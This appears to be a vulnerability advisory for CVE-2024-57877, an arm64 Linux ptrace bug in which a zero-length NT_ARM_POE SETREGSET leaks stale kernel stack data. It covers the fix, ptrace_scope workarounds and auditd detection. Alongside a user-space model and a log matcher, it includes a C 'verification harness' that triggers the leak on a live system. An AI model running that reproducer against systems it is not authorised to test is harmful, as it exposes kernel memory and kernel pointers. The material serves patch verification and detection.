CVE-2024-57877
📋 TL;DR
This CVE describes an information disclosure (and register corruption) bug in the Linux kernel's arm64 ptrace code. The NT_ARM_POE regset exposes the FEAT_POE permission-overlay register POR_EL0 of a traced thread. Its SETREGSET handler, poe_set(), kept the incoming value in an uninitialized local: a PTRACE_SETREGSET with a zero-length iovec copies nothing from userspace but still writes that local into the target thread's saved POR_EL0. A following PTRACE_GETREGSET (or the traced thread itself, since POR_EL0 is readable from user mode) then returns up to 64 bits of stale kernel stack content. A short write of fewer than 8 bytes leaks the remaining bytes the same way. As a side effect the target's POR_EL0 is overwritten with that junk, so the traced thread's memory-permission overlay is corrupted. Affected are arm64 kernels that carry the FEAT_POE ptrace support (introduced in 6.12) without the fix.
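The following is an added example, not code from the kernel or from the CVE text: a user-space model of the vulnerable and fixed shapes of poe_set(). The kernel's user_regset_copyin() is replaced by a simplified stand-in (model_regset_copyin), the thread_model struct stands in for task_struct->thread.por_el0, and the uninitialized stack slot is made explicit as a 'stale' argument so the leak is deterministic instead of undefined behaviour. Only the seed from target->thread.por_el0 in the fixed variant corresponds to the real one-line fix; everything else is modelling.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for task_struct->thread.por_el0 of the traced task. */
struct thread_model {
    uint64_t por_el0;
};

/*
 * Stand-in for user_regset_copyin(): copies min(count, sizeof *ctrl) bytes
 * from the user buffer into the kernel temporary and reports success.
 * A count of 0 copies nothing and still returns 0, which is the path the
 * CVE is about; a count below 8 leaves the remaining bytes untouched.
 */
static int model_regset_copyin(uint64_t *ctrl, const void *ubuf, size_t count)
{
    size_t n = count < sizeof(*ctrl) ? count : sizeof(*ctrl);
    if (n)
        memcpy(ctrl, ubuf, n);
    return 0;
}

/*
 * Vulnerable shape of poe_set(): the temporary is not seeded before the
 * copy-in. In the kernel its content is whatever an earlier code path left
 * in that stack slot; here the caller passes that content as 'stale'.
 */
static int poe_set_vulnerable(struct thread_model *target, const void *ubuf,
                              size_t count, uint64_t stale)
{
    uint64_t ctrl = stale;            /* models the uninitialised local */
    int ret = model_regset_copyin(&ctrl, ubuf, count);
    if (ret)
        return ret;
    target->por_el0 = ctrl;           /* count == 0: stale slot lands in POR_EL0 */
    return 0;
}

/* Fixed shape: seed the temporary from the task's current POR_EL0 first. */
static int poe_set_fixed(struct thread_model *target, const void *ubuf,
                         size_t count, uint64_t stale)
{
    (void)stale;                      /* slot content no longer matters */
    uint64_t ctrl = target->por_el0;  /* the one-line fix */
    int ret = model_regset_copyin(&ctrl, ubuf, count);
    if (ret)
        return ret;
    target->por_el0 = ctrl;
    return 0;
}

/*
 * Drive one SETREGSET of 'count' bytes from 'ubuf' through 'handler' and
 * return what a following GETREGSET would observe. 'current' is the task's
 * POR_EL0 before the call; 'stale' is the leftover stack content.
 */
static uint64_t observe_after_set(int (*handler)(struct thread_model *,
                                                 const void *, size_t, uint64_t),
                                  uint64_t current, const void *ubuf,
                                  size_t count, uint64_t stale)
{
    struct thread_model t = { .por_el0 = current };
    handler(&t, ubuf, count, stale);
    return t.por_el0;
}

int main(void)
{
    const uint64_t current = 0x0000000000000007ull;  /* constructed POR_EL0 value */
    const uint64_t stale   = 0xdeadbeefcafef00dull;  /* constructed stack leftover */
    uint64_t leaked = observe_after_set(poe_set_vulnerable, current, NULL, 0, stale);
    uint64_t kept   = observe_after_set(poe_set_fixed, current, NULL, 0, stale);
    printf("zero-length SETREGSET, vulnerable: POR_EL0 = 0x%016llx\n",
           (unsigned long long)leaked);
    printf("zero-length SETREGSET, fixed:      POR_EL0 = 0x%016llx\n",
           (unsigned long long)kept);
    return 0;
}
```

With a zero-length write the vulnerable variant hands the constructed stack leftover to the caller while the fixed one leaves POR_EL0 at its previous value; with a 4-byte write the vulnerable variant still leaks the other four bytes, which is why the fix seeds from the current register rather than zeroing the temporary.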
💻 Affected Systems
- Linux Kernel
📦 What is this software?
Linux Kernel by Linux
The Linux Kernel is the core component of the Linux operating system, serving as the critical interface between computer hardware and software processes. As the heart of millions of servers, cloud infrastructure, embedded systems, Android devices, and IoT deployments worldwide, the Linux Kernel mana...
⚠️ Risk & Real-World Impact
Worst Case
A local user can read up to 64 bits of stale kernel stack per call and repeat the call at will. The leaked words are whatever earlier kernel code paths left in that stack slot, which in practice often means kernel pointers (weakening KASLR) and, less likely, fragments of other data such as key material that happened to pass through the stack.
Likely Case
Local information disclosure: each zero-length (or short) SETREGSET returns the current contents of one kernel stack slot. The attacker cannot choose what lands there directly, though preceding syscalls influence it. The traced thread's POR_EL0 is also overwritten with that value, corrupting its permission-overlay state.
If Mitigated
A process may always trace its own forked child (PTRACE_TRACEME), so the common default kernel.yama.ptrace_scope=1 does not block this bug. With ptrace_scope=2 only processes holding CAP_SYS_PTRACE can use ptrace, limiting exposure to administrators; ptrace_scope=3 disables ptrace entirely.
🎯 Exploit Status
The CVE description (the fix's commit message) includes a small reproducer, poe-test, that traces a child, issues the zero-length NT_ARM_POE SETREGSET and reads the register back. No privilege beyond tracing one's own child is needed, which the default Yama scope allows. The bug yields read access to a single kernel stack slot only; there is no write primitive beyond clobbering the target's POR_EL0.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Patches available in stable kernel trees (commits 4105dd76bc8ad6529d47157ef0565cb84ca6676c and 594bfc4947c4fcabba1318d8384c61a29a6b89fb). The fix is a one-line change: poe_set() now initializes its temporary from the target's current POR_EL0 (target->thread.por_el0) before the copy-in, so a zero-length or short write leaves the untouched bytes at their previous value.
Vendor Advisory: https://git.kernel.org/stable/c/4105dd76bc8ad6529d47157ef0565cb84ca6676c
Restart Required: Yes
Instructions:
1. Update to a patched Linux kernel version from your distribution vendor.
2. For custom kernels, apply the fix from the stable kernel tree.
3. Reboot the system to load the new kernel.
🔧 Temporary Workarounds
Restrict ptrace access
Limit which processes can use ptrace. Scope 1 (the usual default) only restricts PTRACE_ATTACH to descendants and leaves PTRACE_TRACEME unchanged, so a reproducer that traces its own child still works; use scope 2 (CAP_SYS_PTRACE only) or 3 (no ptrace at all; cannot be lowered again without a reboot). Either command below sets it for the running kernel only; add the setting under /etc/sysctl.d/ to persist it.
echo 2 > /proc/sys/kernel/yama/ptrace_scope
sysctl -w kernel.yama.ptrace_scope=2
Use mandatory access controls
Configure SELinux (the ptrace permission) or AppArmor (ptrace rules) to deny ptrace for domains that do not need it, or apply a seccomp profile that blocks the ptrace syscall for untrusted workloads and containers.
🧯 If You Can't Patch
- Set kernel.yama.ptrace_scope to 2 or 3, or deny ptrace through SELinux, AppArmor or seccomp; scope 1 is not sufficient because the bug is reachable by tracing a child process. Expect unprivileged use of gdb, strace and similar tools to break under these settings.
- Audit the ptrace syscall (request and regset type are visible as syscall arguments) and limit which users get local shell access on affected arm64 systems.
🔍 How to Verify
Check if Vulnerable:
Three conditions must hold: the system is arm64, the kernel carries the FEAT_POE ptrace support (the NT_ARM_POE regset, present from 6.12) without the fix, and the CPU implements FEAT_POE (on other hardware poe_set() returns -EINVAL before the uninitialized value is used, so the bug is not reachable, though the kernel should still be patched). If all three hold, assume vulnerable, or confirm with the poe-test program from the CVE description.
Check Version and Architecture:
uname -rm
Verify Fix Applied:
Confirm the running kernel contains one of the fix commits (for distribution kernels, check the changelog for CVE-2024-57877), or run poe-test: after a zero-length SETREGSET, GETREGSET must return the unchanged POR_EL0 value.
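An added verification harness in the spirit of the poe-test reproducer, not the program from the CVE text. It forks a child, traces it, reads NT_ARM_POE, issues a zero-length SETREGSET, reads the register again and classifies the result. Build and run it on the arm64 system under test; the names probe, classify and poe_verdict are this example's own. NT_ARM_POE (0x40f) comes from the kernel's uapi linux/elf.h and is defined here as a fallback in case the installed headers predate it.

```c
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef NT_ARM_POE
#define NT_ARM_POE 0x40f   /* value from the kernel's uapi linux/elf.h */
#endif

enum poe_verdict { POE_UNSUPPORTED = -1, POE_UNCHANGED = 0, POE_LEAKED = 1 };

/*
 * Decide what a before/after pair means. rc is 0 or -errno from the ptrace
 * calls. Kernels or CPUs without the NT_ARM_POE regset fail with EINVAL,
 * which proves nothing about the fix being present.
 */
static enum poe_verdict classify(int rc, uint64_t before, uint64_t after)
{
    if (rc != 0)
        return POE_UNSUPPORTED;
    return before == after ? POE_UNCHANGED : POE_LEAKED;
}

/* GETREGSET / SETREGSET wrappers for NT_ARM_POE; return 0 or -errno. */
static int poe_get(pid_t pid, uint64_t *val)
{
    struct iovec iov = { .iov_base = val, .iov_len = sizeof(*val) };
    if (ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_ARM_POE, &iov) == -1)
        return -errno;
    return 0;
}

static int poe_set_len(pid_t pid, uint64_t *val, size_t len)
{
    struct iovec iov = { .iov_base = val, .iov_len = len };
    if (ptrace(PTRACE_SETREGSET, pid, (void *)(uintptr_t)NT_ARM_POE, &iov) == -1)
        return -errno;
    return 0;
}

/*
 * Fork a child that asks to be traced and stops itself (no PTRACE_ATTACH
 * needed, so Yama scope 1 does not interfere); then read POR_EL0, issue a
 * zero-length SETREGSET and read it back.
 */
static enum poe_verdict probe(uint64_t *before, uint64_t *after)
{
    pid_t pid = fork();
    if (pid < 0)
        return POE_UNSUPPORTED;       /* cannot test at all */
    if (pid == 0) {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(127);
        raise(SIGSTOP);
        _exit(0);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status))
        return POE_UNSUPPORTED;

    uint64_t dummy = 0;
    int rc = poe_get(pid, before);
    if (rc == 0)
        rc = poe_set_len(pid, &dummy, 0);   /* the zero-length write */
    if (rc == 0)
        rc = poe_get(pid, after);

    kill(pid, SIGKILL);
    waitpid(pid, &status, 0);
    return classify(rc, *before, *after);
}

int main(void)
{
    uint64_t before = 0, after = 0;
    switch (probe(&before, &after)) {
    case POE_UNSUPPORTED:
        puts("NT_ARM_POE regset unavailable (no FEAT_POE, or no POE ptrace support): inconclusive");
        return 2;
    case POE_UNCHANGED:
        printf("POR_EL0 unchanged (0x%016llx): zero-length write is safe, kernel patched\n",
               (unsigned long long)after);
        return 0;
    case POE_LEAKED:
        printf("POR_EL0 changed 0x%016llx -> 0x%016llx: stack data leaked, kernel vulnerable\n",
               (unsigned long long)before, (unsigned long long)after);
        return 1;
    }
    return 2;
}
```

An unchanged reading is strong but not absolute evidence, because the stale stack slot could by chance hold the same value as POR_EL0; run the harness a few times before concluding the kernel is patched. A changed reading is conclusive.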
📡 Detection & Monitoring
Log Indicators:
- ptrace syscalls whose request is PTRACE_SETREGSET (0x4205) and whose regset type is NT_ARM_POE (0x40f), from processes that are not known debuggers or tracers; with auditd logging the ptrace syscall, both values appear as syscall arguments a0 and a2. The iovec length is in the tracer's memory and is not logged, so a zero-length write cannot be told apart from a legitimate one.
Network Indicators:
- None - this is a local vulnerability
SIEM Query (in auditd SYSCALL-record terms; values are hex without a 0x prefix, as auditd prints them):
type=SYSCALL AND arch=c00000b7 AND syscall=117 AND a0=4205 AND a2=40f
(arm64, ptrace syscall, PTRACE_SETREGSET request, NT_ARM_POE regset). Alert on any hit from a process other than an expected debugger; on arm64 the syscall number is 117 and the arch field for AArch64 is c00000b7.
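Added example, not part of this page or of any vendor tooling: a matcher for the query above, run over constructed and abbreviated audit SYSCALL records. It assumes auditd is logging ptrace with a rule such as the one in the leading comment; the record layout (space-separated key=value fields, hex argument values) is auditd's. The sample lines are constructed, and the field_is and is_poe_setregset helpers are this example's own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Assumed auditd rule producing these records:
 *   -a always,exit -F arch=b64 -S ptrace -k ptrace_regset
 *
 * Constructed sample records (abbreviated). arch=c00000b7 is AUDIT_ARCH_AARCH64,
 * syscall=117 is ptrace on arm64, a0 is the ptrace request and a2 the regset
 * type passed in the 'addr' argument. Line 1 is the interesting one; line 2 is
 * a GETREGSET, line 3 a SETREGSET for a different regset, line 4 an x86-64
 * record where 0x40f means nothing.
 */
static const char *const SAMPLE_AUDIT_LINES[] = {
    "type=SYSCALL msg=audit(1735689600.101:2001): arch=c00000b7 syscall=117 success=yes exit=0 a0=4205 a1=4e2 a2=40f a3=ffffd3a9c2b0 pid=1250 uid=1000 comm=\"poe-test\" exe=\"/tmp/poe-test\" key=\"ptrace_regset\"",
    "type=SYSCALL msg=audit(1735689600.102:2002): arch=c00000b7 syscall=117 success=yes exit=0 a0=4204 a1=4e2 a2=40f a3=ffffd3a9c2b0 pid=1250 uid=1000 comm=\"poe-test\" exe=\"/tmp/poe-test\" key=\"ptrace_regset\"",
    "type=SYSCALL msg=audit(1735689600.203:2003): arch=c00000b7 syscall=117 success=yes exit=0 a0=4205 a1=51c a2=400 a3=ffffd3a9c2b0 pid=1307 uid=1000 comm=\"gdb\" exe=\"/usr/bin/gdb\" key=\"ptrace_regset\"",
    "type=SYSCALL msg=audit(1735689600.304:2004): arch=c000003e syscall=101 success=yes exit=0 a0=4205 a1=5dc a2=40f a3=7ffc1b2c4d10 pid=1400 uid=1000 comm=\"strace\" exe=\"/usr/bin/strace\" key=\"ptrace_regset\"",
};
#define NSAMPLE (sizeof SAMPLE_AUDIT_LINES / sizeof SAMPLE_AUDIT_LINES[0])

/* Return a pointer to the value of "key=" in an audit record, or NULL. */
static const char *audit_field(const char *line, const char *key)
{
    size_t klen = strlen(key);
    const char *p = line;
    while ((p = strstr(p, key)) != NULL) {
        /* key must start a field (line start or after a space) and be followed by '=' */
        if ((p == line || p[-1] == ' ') && p[klen] == '=')
            return p + klen + 1;
        p += klen;
    }
    return NULL;
}

/* Compare a field's value (ending at a space or end of line) with 'want'. */
static int field_is(const char *line, const char *key, const char *want)
{
    const char *v = audit_field(line, key);
    size_t wl = strlen(want);
    return v != NULL && strncmp(v, want, wl) == 0 && (v[wl] == ' ' || v[wl] == '\0');
}

/* True for an arm64 ptrace(PTRACE_SETREGSET, ..., NT_ARM_POE, ...) record. */
int is_poe_setregset(const char *line)
{
    return field_is(line, "type", "SYSCALL")
        && field_is(line, "arch", "c00000b7")   /* AUDIT_ARCH_AARCH64 */
        && field_is(line, "syscall", "117")     /* __NR_ptrace on arm64 */
        && field_is(line, "a0", "4205")         /* PTRACE_SETREGSET */
        && field_is(line, "a2", "40f");         /* NT_ARM_POE */
}

/* Count matching records in a batch of lines. */
size_t count_poe_setregset(const char *const *lines, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += is_poe_setregset(lines[i]) ? 1 : 0;
    return hits;
}

int main(void)
{
    for (size_t i = 0; i < NSAMPLE; i++)
        if (is_poe_setregset(SAMPLE_AUDIT_LINES[i]))
            printf("ALERT: NT_ARM_POE SETREGSET: %s\n", SAMPLE_AUDIT_LINES[i]);
    return 0;
}
```

Only the first record matches; the GETREGSET, the other regset and the x86-64 record are rejected. The arch check matters because syscall numbers differ per architecture and 0x40f only denotes NT_ARM_POE on arm64. Whether the matched write had a zero-length iovec cannot be recovered from the record, so triage the hit by the tracing process (comm/exe) rather than by the arguments alone.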